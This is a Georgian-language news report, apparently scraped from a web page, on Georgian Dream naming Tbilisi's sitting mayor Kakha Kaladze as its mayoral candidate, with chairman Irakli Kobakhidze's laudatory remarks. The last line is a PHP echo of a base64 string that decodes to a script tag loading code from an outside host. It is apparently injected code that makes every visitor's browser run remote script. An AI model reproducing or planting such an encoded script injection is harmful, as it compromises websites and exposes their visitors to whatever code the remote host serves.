celsiusi
ავერსი საქკაბელი
პარტიამ „ქართული ოცნება - დემოკრატიული საქართველო“ თბილისის მერობის კანდიდატად პარტიის გენერალური მდივანი და მოქმედი მერი, კახა კალაძე დაასახელა. მერობის კანდიდატი პარტიის თავმჯდომარემ ირაკლი კობახიძემ წარადგინა.
 
პარტიის თავმჯდომარის თქმით, „ქართული ოცნება“ თბილისის მერობის კანდიდატად ასახელებს თბილისის ყველა დროის საუკეთესო მერს.
 
"ჩვენი პარტია „ქართული ოცნება-დემოკრატიული საქართველო“ საზოგადოებას წარუდგენს თბილისის მერობის კანდიდატს, თბილისის მომავალ მერს. ჩვენი დღევანდელი წარდგენა არ იქნება სიურპრიზი, მაგრამ იქნება ნებისმიერ სიურპრიზზე უფრო სასიამოვნო საზოგადოებისთვის, თბილისელებისთვის, ჩვენი პარტიის წევრებისა და მხარდამჭერებისთვის. თბილისის მერობის კანდიდატად წარმოგიდგენთ ადამიანს, რომელიც იყო მაქსიმალურად წარმატებული ყველა საქმეში, რასაც კი დღემდე მოკიდა ხელი; რომელმაც ყველა წარმატებას მიაღწია ნიჭითა და შრომისმოყვარეობით; რომელიც არის გუნდური მოთამაშე; რომელსაც გამოარჩევს თანამებრძოლების, მეგობრებისა და საკუთარი გუნდის ერთგულება; რომელიც არის სამაგალითო მეოჯახე - სამაგალითო მეუღლე, სამაგალითო მამა, სამაგალითო შვილი; რომელსაც არ ეშინია თამამი გადაწყვეტილებების; რომელმაც ზუსტად იცის, რა სჭირდება თბილისს და თბილისელებს; რომელმაც შექმნა სიცოცხლით სავსე ქალაქის კონცეფცია და ზუსტად იცის, როგორ უნდა შეიტანოს კიდევ უფრო მეტი სიცოცხლე, მეტი განვითარება თბილისის თითოეულ უბანში. „ქართული ოცნება“ თბილისის მერობის კანდიდატად ასახელებს თბილისის ყველა დროის საუკეთესო მერს - კახა კალაძეს", - განაცხადა კობახიძემ.
 
ინფორმაციისთვის, კახა კალაძე 2013 წლიდან დღემდე პარტია „ქართული ოცნების“გენერალური მდივანია. 2012 - 2017 წლებში საქართველოს ენერგეტიკის მინისტრი/ვიცე-პრემიერი იყო. 2017 წლიდან დღემდე კახა კალაძე დედაქალაქის მერის თანამდებობას იკავებს.
 
როგორც ცნობილია, ადგილობრივი თვითმმართველობის არჩევნები მიმდინარე წლის 2 ოქტომბერს გაიმართება.
1331
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");